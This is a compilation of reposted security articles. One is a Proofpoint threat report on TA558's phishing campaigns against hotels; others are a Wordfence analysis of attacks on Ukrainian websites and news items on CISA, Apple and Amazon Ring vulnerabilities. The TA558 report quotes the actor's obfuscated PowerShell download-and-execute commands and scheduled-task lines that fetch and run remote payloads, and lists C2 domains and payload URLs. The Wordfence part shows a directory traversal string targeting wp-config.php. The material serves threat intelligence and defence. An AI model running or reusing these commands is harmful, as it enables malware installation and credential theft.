From: Oab Brasil <fernando1540@bol[.]com[.]br>

Subject: Orçamento Conferencistas – 515449939

Attachment: reserva.ppa

SHA256: c2b817b02e56624c8ed7944e76a3896556dc2b7482f747f4be88f95e232f9207

TA558

Figure 4: Example TA558 email from 2020

The message contained a PowerPoint attachment that used template injection techniques and VBA macros which, if enabled, executed a PowerShell script to download a VBS payload from an actor-controlled domain. The VBS script in turn downloaded and executed Revenge RAT.

Attack Path

Figure 5: 2020 attack path example

TA558 was more active in 2020 than previous years and 2021, with 74 campaigns identified. 2018, 2019, and 2021 had 9, 70, and 18 total campaigns, respectively. So far in 2022, Proofpoint analysts have observed 51 TA558 campaigns. 

TA558

Figure 6: Total number of TA558 campaigns over time

2021

In 2021, this actor continued to leverage emails with Office documents containing macros or Office exploits (e.g. CVE-2017-8570) to download and install malware. Its most consistently used malware payloads included vjw0rm, njRAT, Revenge RAT, Loda, and AsyncRAT. 

Additionally, this group started to include more elaborate attack chains in 2021. For example, introducing more helper scripts and delivery mechanisms such as embedded Office documents within MSG files.

In this example 2021 campaign, emails purported to be, e.g.:

From: Financeiro UNIMED <financeiro@unimed-corporated[.]com>

Subject: Reserva

Replyto: cdt[name]cdt@gmail[.]com

Attachment: OficioCircularencaminhadoaoSetorFinanceiroUNIMED.docx

SHA256: 2f0f99cbac828092c0ec23e12ecb44cbf53f5a671a80842a2447e6114e4f6979

Emails masqueraded as Unimed, a Brazilian medical work cooperative and health insurance operator. These messages contained Microsoft Word attachments with macros which, if enabled, invoked a series of scripts to ultimately download and execute AsyncRAT. 

TA558

Figure 7: Example TA558 email from 2021

Of note is the repeat use of the string “CDT” contained the replyto email address and C2 domain names.

AsyncRAT C2 domains:

warzonecdt[.]duckdns[.]org

cdt2021.zapto[.]org

Example PowerShell execution to download and execute AsyncRAT:

$NOTHING = ‘(Ne<^^>t.We’.Replace(‘<^^>’,’w-Object

Ne’);$alosh=’bC||||||!@!@nlo’.Replace(‘||||||!@!@’,’lient).Dow’); $Dont=’adString(”hxxps[:]//brasilnativopousada[.]com[.]br/Final.txt”)

‘;$YOUTUBE=IEX ($NOTHING,$alosh,$Dont -Join ”)|IEX

Persistence was achieved through a scheduled task masquerading as a Spotify service.

schtasks /create /sc MINUTE /mo 1 0 /tn "Spotfy" /tr
 "\"%windir%\system32\mshta.exe\"hxxps[:]//www[.]unimed-
corporated[.]com/microsoft.txt" /F

This was the actor’s least active year. Proofpoint observed just 18 campaigns conducted by TA558 in 2021.

2022

In 2022, campaign tempo increased significantly. Campaigns delivered a mixture of malware such as, Loda, Revenge RAT, and AsyncRAT. This actor used a variety of delivery mechanisms including URLs, RAR attachments, ISO attachments, and Office documents.

TA558 followed the trend of many threat actors in 2022 and began using container files such as RAR and ISO attachments instead of macro-enabled Office documents. This is likely due to Microsoft’s announcements in late 2021 and early 2022 about disabling macros by default in Office products, which caused a shift across the threat landscape of actors adopting new filetypes to deliver payloads.

Additionally, TA558 began using URLs more frequently in 2022. TA558 conducted 27 campaigns with URLs in 2022, compared to just five campaigns total from 2018 through 2021. Typically, URLs led to container files such as ISOs or zip files containing executables.

TA558

Figure 8: Campaigns using specific threat types over time

For example, this 2022 Spanish language campaign featured URLs leading to container files. Messages purported to be, e.g.:

From: Mauricio Fortunato <contato@155hotel[.]com[.]br>

Subject: Enc: Reserva Familiar

The URL purported to be a legitimate 155 Hotel reservation link that led to an ISO file and an embedded batch file. The execution of the BAT file led to a PowerShell helper script that downloaded a follow-on payload, AsyncRAT.

Similar to earlier campaigns, persistence was achieved via a scheduled task:

schtasks /create /sc MINUTE /mo 1 /tn Turismo /F /tr
"powershell -w h -NoProfile -ExecutionPolicy Bypass -
Command start-sleep -s 20;iwr ""\""hxxps[:]//unimed-
corporated[.]com/tur/turismo[.]jpg""\"" -useB|iex;"
TA558

Figure 9: 2022 campaign example chain.

In April 2022 Proofpoint researchers spotted a divergence from the typical email lure. One of the campaigns included a QuickBooks invoice email lure. Additionally, this campaign included the distribution of RevengeRAT which had not been observed in use by TA558 since December 2020. Messages purported to be:

From: Intuit QuickBooks Team <quickbooks@unimed-corporated.com>

Subject: QuickBooks Invoice 1000172347

Attachment: 1000172347.xlsm

SHA256: b57a9f7321216c3410ebcc9d4b09e73a652dee9e750f96b2f6d7d1e39e2923d6

The emails contained Excel attachments with macros that downloaded helper scripts via PowerShell and MSHTA. The execution of helper scripts ultimately led to the installation of RevengeRAT. Proofpoint has not seen this theme since April, and it is unclear why TA558 temporarily pivoted away from reservations themes. 

Malware Use

Since 2018, TA558 has used at least 15 different malware families, sometimes with overlapping command and control (C2) domains. The most frequently observed payloads include Loda, Vjw0rm, AsyncRAT, and Revenge RAT.  

TA558

Figure 10: Number of TA558 campaigns by malware type over time

Typically, TA558 uses attacker owned and operated infrastructure. However, Proofpoint has observed TA558 leverage compromised hotel websites to host malware payloads, thus adding legitimacy to its malware delivery and C2 traffic.  

Language Use

Since Proofpoint began tracking TA558 through 2022, over 90% of campaigns were conducted in Portuguese or Spanish, with four percent featuring multiple language lure samples in English, Spanish, or Portuguese.

TA558

Figure 11: Campaign totals by language since 2018

Interestingly, the threat actor often switches languages in the same week. Proofpoint researchers have observed this actor send, for example, a campaign in English and the following day another campaign in Portuguese. Individual targeting typically differs based on campaign language.

Notable Campaign Artifacts

In addition to the consistent lure themes, targeting, message content, and malware payloads, Proofpoint researchers observed TA558 using multiple notable patterns in campaign data including the use of certain strings, naming conventions and keywords, domains, etc. For example, the actor appears to repeat the term CDT in email and malware attributes. This may relate to the CDT Travel organization and related travel reservation lure themes. Proofpoint researchers observed TA558 use the CDT term in dozens of campaigns since 2018, in C2 domains, replyto email addresses, payload URLs, scheduled task name, and Microsoft Office document metadata (i.e., Author, Last Saved By), and Microsoft Office macro language.

Throughout many of the 2019 and 2020 campaigns the threat actor used various URLs from the domain sslblindado[.]com to download either helper scripts or malware payloads. Some examples include:

  • microsofft[.]sslblindado[.]com
  • passagensv[.]sslblindado[.]com
  • system11[.]sslblindado[.]com

Like other threat actors, this group sometimes mimics technology service names to appear legitimate. For example, using terms in payload URLs or C2 domain names. Some examples include:

  • microsofft[.]sslblindado[.]com
  • firefoxsystem[.]sytes[.]net
  • googledrives[.]ddns[.]net

Another interesting pattern observed were common strings like “success” and “pitbull”. In several campaigns Proofpoint researchers spotted these strings in C2 domains. Some examples include:

  • successfully[.]hopto[.]org
  • success20[.]hopto[.]org
  • 4success[.]zapto[.]org

From 2019 through 2020, TA558 conducted 10 campaigns used the keyword “Maringa” or “Maaringa” in payload URLs or email senders. Maringa is a city in Brazil. Examples include:

  • maringareservas[.]com[.]br/seila[.]rtf
  • maringa[.]turismo@system11[.]com[.]br

Possible Objectives

Proofpoint has not observed post-compromise activity from TA558. Based on the observed payloads, victimology, and campaign and message volume, Proofpoint assesses with medium to high confidence that this is a financially motivated cybercriminal actor.

The malware used by TA558 can steal data including hotel customer user and credit card data, allow lateral movement, and deliver follow-on payloads.

Open-source reporting provides insight into one possible threat actor objective. In July, CNN Portugal reported a Portuguese hotel’s website was compromised, and the actor was able to modify the website and direct customers to a fake reservation page. The actor stole funds from potential customers by posing as the compromised hotel. Although Proofpoint does not associate the identified activity with TA558, it provides an example of possible follow-on activity and the impacts to both target organizations and their customers if an actor is able to compromise hotel or transportation entities.

Conclusion

TA558 is an active threat actor targeting hospitality, travel, and related industries since 2018. Activity conducted by this actor could lead to data theft of both corporate and customer data, as well as potential financial losses.

Organizations, especially those operating in targeted sectors in Latin America, North America, and Western Europe should be aware of this actor’s tactics, techniques, and procedures.

Indicators of Compromise (IOCs)  

The following IOCs represent a sample of indicators observed by Proofpoint researchers associated with TA558.  

C2 Domains

IndicatorDescriptionDate Observed
quedabesouro[.]ddns[.]netRevengeRAT C2 Domain2018
queda212[.]duckdns[.]orgnjRAT/RevengeRAT C2 Domain2018
3030pp[.]hopto[.]orgvjw0rm C2 Domain2018 and 2019
vemvemserver[.]duckdns[.]orgHoudini/Loda C2 Domain2019
4success[.]zapto[.]orgLoda C2 Domain2019
success20[.]hopto[.]orgLoda C2 Domain2020
msin[.]hopto[.]orgLoda C2 Domain2021 and 2022
cdtpitbull[.]hopto[.]orgAsyncRAT C2 Domain2021 and 2022
111234cdt[.]ddns[.]netnjRAT/AsyncRAT C2 Domain2021 and 2022
cdt2021[.]zapto[.]orgAsyncRAT C2 Domain2021 and 2022
38[.]132[.]101[.]45RevengRAT C2 IP2022

Payload URLs

IndicatorDescriptionDate Observed
hxxp[://]cdtmaster[.]com[.]br/DadosDaReserva[.]docRTF payload URL2018 
hxxp[://]hypemediardf[.]com[.]pl/css/css[.]docLoda Payload URL2019
hxxps[:]//brasilnativopousada[.]com[.]br/Final[.]txtAsyncRAT Payload URL2021
hxxps[:]//www[.]unimed-corporated[.]com/microsoft[.]txtAsyncRAT Scheduled Task URL2021
hxxps[:]//unimed-corporated[.]com/tur/turismo[.]jpgAsyncRAT Scheduled Task URL2022

ET Signatures

ETPRO MALWARE Loda Logger CnC Activity

ETPRO TROJAN MSIL/Revenge-RAT Keep-Alive Activity (Outbound)

ETPRO TROJAN MSIL/Revenge-RAT CnC Checkin

ETPRO TROJAN MSIL/Revenge-RAT CnC Checkin M2

ETPRO TROJAN MSIL/Revenge-RAT CnC Checkin M4

ETPRO TROJAN njRAT/Bladabindi Variant CnC Activity (inf)

ETPRO TROJAN Generic njRAT/Bladabindi CnC Activity (act)

ETPRO TROJAN Generic njRAT/Bladabindi CnC Activity (inf)

ET TROJAN Bladabindi/njRAT CnC Command (ll)

Source :
https://www.proofpoint.com/us/blog/threat-insight/reservations-requested-ta558-targets-hospitality-and-travel

CISA Adds 7 New Actively Exploited Vulnerabilities to Catalog

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Thursday moved to add a critical SAP security flaw to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation.

The issue in question is CVE-2022-22536, which has received the highest possible risk score of 10.0 on the CVSS vulnerability scoring system and was addressed by SAP as part of its Patch Tuesday updates for February 2022.

CyberSecurity

Described as an HTTP request smuggling vulnerability, the shortcoming impacts the following product versions –

  • SAP Web Dispatcher (Versions – 7.49, 7.53, 7.77, 7.81, 7.85, 7.22EXT, 7.86, 7.87)
  • SAP Content Server (Version – 7.53)
  • SAP NetWeaver and ABAP Platform (Versions – KERNEL 7.22, 8.04, 7.49, 7.53, 7.77, 7.81, 7.85, 7.86, 7.87, KRNL64UC 8.04, 7.22, 7.22EXT, 7.49, 7.53, KRNL64NUC 7.22, 7.22EXT, 7.49)

“An unauthenticated attacker can prepend a victim’s request with arbitrary data, allowing for function execution impersonating the victim or poisoning intermediary web caches,” CISA said in an alert.

“A simple HTTP request, indistinguishable from any other valid message and without any kind of authentication, is enough for a successful exploitation,” Onapsis, which discovered the flaw, notes. “Consequently, this makes it easy for attackers to exploit it and more challenging for security technology such as firewalls or IDS/IPS to detect it (as it does not present a malicious payload).”

Aside from the SAP weakness, the agency added new flaws disclosed by Apple (CVE-2022-32893, and CVE-2022-32894) and Google (CVE-2022-2856) this week as well as previously documented Microsoft-related bugs (CVE-2022-21971 and CVE-2022-26923) and a remote code execution vulnerability in Palo Alto Networks PAN-OS (CVE-2017-15944, CVSS score: 9.8) that was disclosed in 2017.

CyberSecurity

CVE-2022-21971 (CVSS score: 7.8) is a remote code execution vulnerability in Windows Runtime that was resolved by Microsoft in February 2022. CVE-2022-26923 (CVSS score: 8.8), fixed in May 2022, relates to a privilege escalation flaw in Active Directory Domain Services.

“An authenticated user could manipulate attributes on computer accounts they own or manage, and acquire a certificate from Active Directory Certificate Services that would allow elevation of privilege to System,” Microsoft describes in its advisory for CVE-2022-26923.

The CISA notification, as is traditionally the case, is light on technical details of in-the-wild attacks associated with the vulnerabilities so as to avoid threat actors taking further advantage of them.

To mitigate exposure to potential threats, Federal Civilian Executive Branch (FCEB) agencies are mandated to apply the relevant patches by September 8, 2022.

Source :
https://thehackernews.com/2022/08/cisa-adds-7-new-actively-exploited.html

Analyzing Attack Data and Trends Targeting Ukrainian Domains

As we continue to monitor the cyber situation in Ukraine, the data we are seeing shows some interesting trends. Not only has the volume of attacks continued rising throughout the conflict in Ukraine, the types of attacks have been varied. A common tactic of cyber criminals is to run automated exploit attempts, hitting as many possible targets as they can to see what gets a result. The data we have analyzed shows that this tactic is being used against Ukrainian websites. This is in contrast to a targeted approach where threat actors go after specific individuals or organizations, using gathered intelligence to make at least an educated guess at the type of vulnerabilities that may be exploitable.

Data Shows a Variety of Attack Types

In the past 30 days, we have seen 16 attack types that triggered more than 85 different firewall rules across protected websites with .ua top-level domains. These rules blocked more than 9.8 million attack attempts on these websites, with the top five attack types accounting for more than 9.7 million of those attempts.

Top blocked rules against .ua domains

In order to demonstrate the top five attack types, we are going to follow a single threat actor who has been observed attempting each of these attack types throughout the last 30 days. Combining the originating IP addresses associated with the attack attempts with the user-agent that was used and other commonalities, we can say with a high degree of certainty that the demonstrated attack attempts were work of the same threat actor.

Known Malicious IP Addresses

The largest category of blocked attack attempts were due to use of a known malicious IP address. These IP addresses are maintained by the Wordfence blocklist, with new addresses added when they become maliciously engaged, and removed when they are no longer being used maliciously. When we see activity from an IP address on the blocklist, it is immediately blocked, however we do track the request that was received from the attacking server.

Top IPs blocked from attacking .ua domains

The top IP addresses we have blocked using known malicious IP addresses were often seen attempting to upload spam content to websites, however it was also common to see file upload and information disclosure attempts as well. Here we see a simple POST request that uses URL encoding along with base64 encoding to obfuscate a command to be run.

Blocked IP request example 1

The decoded payload will simply display XO_Sp3ctra to alert the malicious actor that the affected system will allow commands to be run by them.

Output from blocked IP example 1

When we look at the top known malicious IP addresses blocked worldwide, the top 15 are IP addresses within Russia. This does not match what we are seeing in the Ukraine, where the top attacking IP addresses vary in location across North America, Europe, and Asia, with only three in Russia. However, there is a similarity. The IP address in 15th position worldwide for most initiated exploit attempts is in 4th position for blocked attacks against .ua domains. The IP address, 152.89.196.102, is part of an ASN belonging to Chang Way Technologies Co. Limited. The IP itself is located in Russia, but assigned to a company named Starcrecium Limited, which is based in Cyprus and has been used to conduct attacks of this type in the past. This IP has been blocked 78,438 times on .ua websites, with a total of 3,803,734 blocked attack attempts worldwide.

When you consider the fact that we logged malicious activity from almost 2.1 million individual IP addresses in this time, and the 15th worldwide ranked IP was ranked 4th against an area as small as Ukraine, the number of blocked attacks becomes very significant. Additionally, there were three IP addresses that ranked higher in Ukraine, but did not even make the top 20 worldwide, showing that while there are threat actors who are not focusing heavily on Ukraine, others are very focused on Ukrainian websites. What we are seeing from the IP addresses targeting Ukrainian websites more heavily is similar to what we see here, with information gathering and uploading spam content being the two main goals of the attack attempts.

One thing to keep in mind here is the fact that all .ua sites get our real-time threat intelligence, which is typically reserved for Wordfence Premium, Care, and Response customers, so it is not possible to get a true comparison between the websites in Ukraine and the rest of the world. IP addresses are added to the blocklist for many reasons, including the attack types we outlined above. Often these addresses are blocked for simple malicious behavior, such as searching for the existence of specific files on a website. More complex behavior like searching for the ability to run commands on the server will also lead to an IP being added to the blocklist.

Known Malicious User-Agents

One way that we block attacks is by tracking known malicious user-agents. This was the second-largest category our firewall blocked on .ua domains. When we see a user-agent string that is consistently being used in malicious events, like the user-agent below, we add it to a firewall rule.

Known malicious user-agent string

User-agent strings can be set to an arbitrary value, so blocking user-agents is not sufficient to maintain security on its own. Nonetheless, tracking and blocking consistently malicious user-agents still allows us to block millions of additional attacks a day and provides us with a great degree of visibility into attacks that are less targeted at specific vulnerabilities. Many threat actors consistently use a given user-agent string, so this also allows us to block a large number of credential stuffing attacks on the first attempt, rather than after a certain threshold of failed logins.

There are many reasons a user-agent will be blocked by the Wordfence firewall, but always for consistent malicious activity. For instance, the user-agent here has been tracked in numerous types of attack attempts without consistent legitimate activity or false positives being detected. It is frequently found looking for configuration files, such as the aws.yml file in this example. Keep in mind that the fact that the actor is searching for this file does not automatically mean it exists on the server. However, if the file does exist and can be read by a would-be attacker, the data contained in the file would tell them a lot about the Amazon Web Services server configuration being used. This could lead to the discovery of vulnerabilities or other details that could help a malicious actor damage a website or server.

Malicious user-agent request example 1

Similarly, information about the server could be discovered no matter who the server provider is if a file that returns configuration information, such as a info.php or server_info.php file can be discovered and accessed. Knowing the web server version, PHP version, and other critical details can add up to a vulnerability discovery that makes it easy for a malicious actor to access a website.

Malicious user-agent request example 2

In addition to searching for configuration files, and other malicious activities, we also see an attacker using this specific user-agent attempting to upload malicious files to the servers they are trying to compromise. The following shows an attacker using the same known malicious user-agent attempting to upload a zip file, which, if successful, unzips to install a file named sp3ctra_XO.php on the server. When we said there were clues that these attack attempts were being perpetrated by the same threat actor, you can see here what one of those clues are with the sp3ctra_XO.php filename variation of the XO_Sp3ctra output seen earlier.

Malicious user-agent request example 3

Over the past 30 days, we have observed this user-agent string used in more than 1.3 million attack attempts against Ukrainian websites. This makes it the largest attacking user-agent that is not immediately recognizable as an unusual user-agent. The only user-agent string that had more tracked attack attempts is wp_is_mobile. These user-agent strings are among the dozens that have been observed over time to be consistently associated only with malicious activity.

The user-agent we are following here was logged in 1,115,824,706 attack attempts worldwide in the same time frame, making this a very common malicious user-agent string. With this being a prolific user-agent in attacks around the world, it is no surprise that it is being seen in regular attack attempts on Ukrainian websites. Whether specifically targeted, or just a victim of circumstance, Ukrainian websites are seeing an increase in attacks. This is likely due to heightened activity from threat actors globally.

Directory Traversal

The next largest category of attack attempts we have been blocking targeting .ua domains was directory traversal. This relies on a malicious actor getting into the site files wherever they can, often through a plugin or theme vulnerability, and trying to access files outside of the original file’s directory structure. We are primarily seeing this used in much the same way as the information disclosure attacks, as a way to access the wp-config.php file that potentially provides database credentials. Other uses for this type of attack can also include the ability to get a list of system users, or access other sensitive data stored on the server.

Directory traversal request example

In this example, the malicious actor attempted to download the site’s wp-config.php file by accessing the file structure through a download.php file in the twentyeleven theme folder, and moving up the directory structure to the WordPress root, where the wp-config.php file is located. This is seen in the request by adding ?file=..%2F..%2F..%2Fwp-config.php. This tells the server to look for a wp-config. php file that is three directories higher than the current directory.

This type of attack is often a guessing game for the malicious actor, as the path they are attempting to traverse may not even exist, but when it does, it can result in stolen data or damage to a website or system. The fact that the twentyeleven theme was used here does not necessarily indicate that the theme was vulnerable, or even installed on the site, only that the malicious actor was attempting to use it as a jumping off point while trying to find a vulnerable download.php file that could be used for directory traversal.

Information Disclosure

Information disclosure attacks are the fourth-largest attack type we blocked against .ua domains. The primary way we have observed threat actors attempting to exploit this type of vulnerability is through GET requests to a website, using common backup filenames, as seen in the example below. Unfortunately, due to the insecure practice of system administrators appending filenames with .bak as a method of making a backup of a file prior to modifying the contents, threat actors are likely to successfully access sensitive files by simply attempting to request critical files in known locations, with the .bak extension added. When successful, the contents of the file will be returned to the threat actor.

This is a fairly straightforward attack type, where the request simply returns the contents of the requested file. If a malicious actor can obtain the contents of a site’s wp-config.php file, even an outdated version of the file, they may be able to obtain the site’s database credentials. With access to a site’s database credentials, an attacker could gain full database access granted they have access to the database to log in with the stolen credentials. This would then give the attacker the ability to add malicious users, change a site’s content, and even collect useful information to be used in future attacks against the site or its users.

Information disclosure request example

File Upload

File upload rounds out the top five categories of attack attempts we have been blocking targeting .ua domains. In these attempts, malicious actors try to get their own files uploaded to the server the website is hosted on. This serves a number of purposes, from defacing a website, to creating backdoors, and even distributing malware.

The example here is only one of the many types of upload attacks we have blocked. A malicious actor can use this POST request to upload a file to a vulnerable website that allows them to upload any file of their choosing. This can ultimately lead to remote code execution and full server compromise.

File upload request example with payload

The POST request in this case includes the contents of a common PHP file uploader named bala.php. This code provides a simple script to select and upload any file the malicious actor chooses. If the upload is successful they will see a message stating eXploiting Done but if it fails they message will read Failed to Upload. The script also returns some general information about the system that is being accessed, including the name of the system and the operating system being used.

Another important thing to note about this request is that it attempts to utilize the Ioptimization plugin as an entry point. Ioptimization is a known malicious plugin that offers backdoor functionality, but was not actually installed in the site in question. This indicates that the threat actor was trying to find and take over sites that had been previously compromised by a different attacker.

BalaSniper upload example

The fact that file uploads are the most common blocked attack type is not at all surprising. File uploads can be used to distribute malware payloads, store spam content to be displayed in other locations, and install shells on the infected system, among a number of other malicious activities. If a malicious actor can upload an executable file to a site, it generally gives them full control of the infected site and a foothold to taking over the server hosting that site. It can also help them remain anonymous by allowing them to send out further attacks from the newly infected site.

Conclusion

In this post, we continued our analysis of the cyber attacks targeting Ukrainian websites. While there has been an increase in the number of attacks being blocked since the start of Russia’s invasion of Ukraine, the attacks do not appear to be focused. Known malicious IP addresses were the most common reason we blocked attacks in the last 30 days, however, information stealing and spam were the most common end goals for the observed attack attempts.

If you believe your site has been compromised as a result of a vulnerability, we offer Incident Response services via Wordfence Care. If you need your site cleaned immediately, Wordfence Response offers the same service with 24/7/365 availability and a 1-hour response time. Both of these products include hands-on support in case you need further assistance.

Source :
https://www.wordfence.com/blog/2022/08/analyzing-attack-data-and-trends-targeting-ukrainian-domains/

Apple Releases Security Updates to Patch Two New Zero-Day Vulnerabilities

Apple on Wednesday released security updates for iOS, iPadOS, and macOS platforms to remediate two zero-day vulnerabilities previously exploited by threat actors to compromise its devices.

The list of issues is below –

  • CVE-2022-32893 – An out-of-bounds issue in WebKit which could lead to the execution of arbitrary code by processing a specially crafted web content
  • CVE-2022-32894 – An out-of-bounds issue in the operating system’s Kernel that could be abused by a malicious application to execute arbitrary code with the highest privileges

Apple said it addressed both the issues with improved bounds checking, adding it’s aware the vulnerabilities “may have been actively exploited.”

The company did not disclose any additional information regarding these attacks or the identities of the threat actors perpetrating them, although it’s likely that they were abused as part of highly-targeted intrusions.

CyberSecurity

The latest update brings the total number of zero-days patched by Apple to six since the start of the year –

  • CVE-2022-22587 (IOMobileFrameBuffer) – A malicious application may be able to execute arbitrary code with kernel privileges
  • CVE-2022-22620 (WebKit) – Processing maliciously crafted web content may lead to arbitrary code execution
  • CVE-2022-22674 (Intel Graphics Driver) – An application may be able to read kernel memory
  • CVE-2022-22675 (AppleAVD) – An application may be able to execute arbitrary code with kernel privileges

Both the vulnerabilities have been fixed in iOS 15.6.1, iPadOS 15.6.1, and macOS Monterey 12.5.1. The iOS and iPadOS updates are available for iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation).

Update: Apple on Thursday released a security update for Safari web browser (version 15.6.1) for macOS Big Sur and Catalina to patch the WebKit vulnerability fixed in macOS Monterey.

Source :
https://thehackernews.com/2022/08/apple-releases-security-updates-to.html

New Amazon Ring Vulnerability Could Have Exposed All Your Camera Recordings

Retail giant Amazon patched a high-severity security issue in its Ring app for Android in May that could have enabled a rogue application installed on a user’s device to access sensitive information and camera recordings.

The Ring app for Android has over 10 million downloads and enables users to monitor video feeds from smart home devices such as video doorbells, security cameras, and alarm systems. Amazon acquired the doorbell maker for about $1 billion in 2018.

Application security firm Checkmarx explained it identified a cross-site scripting (XSS) flaw that it said could be weaponized as part of an attack chain to trick victims into installing a malicious app.

CyberSecurity

The app can then be used to get hold of the user’s Authorization Token, that can be subsequently leveraged to extract the session cookie by sending this information alongside the device’s hardware ID, which is also encoded in the token, to the endpoint “ring[.]com/mobile/authorize.”

Armed with this cookie, the attacker can sign in to the victim’s account without having to know their password and access all personal data associated with the account, including full name, email address, phone number, and geolocation information as well as the device recordings.

https://youtube.com/watch?v=eJ5Qsx4Fdks

This is achieved by querying the below two endpoints –

  • account.ring[.]com/account/control-center – Get the user’s personal information and Device ID
  • account.ring[.]com/api/cgw/evm/v2/history/devices/{{DEVICE_ID}} – Access the Ring device data and recordings
CyberSecurity

Checkmarx said it reported the issue to Amazon on May 1, 2022, following which a fix was made available on May 27 in version 3.51.0. There is no evidence that the issue has been exploited in real-world attacks, with Amazon characterizing the exploit as “extremely difficult” and emphasizing that no customer information was exposed.

The development comes more than a month after the company moved to address a severe weakness affecting its Photos app for Android that could have been exploited to steal a user’s access tokens.

Source :
https://thehackernews.com/2022/08/new-amazon-ring-vulnerability-could.html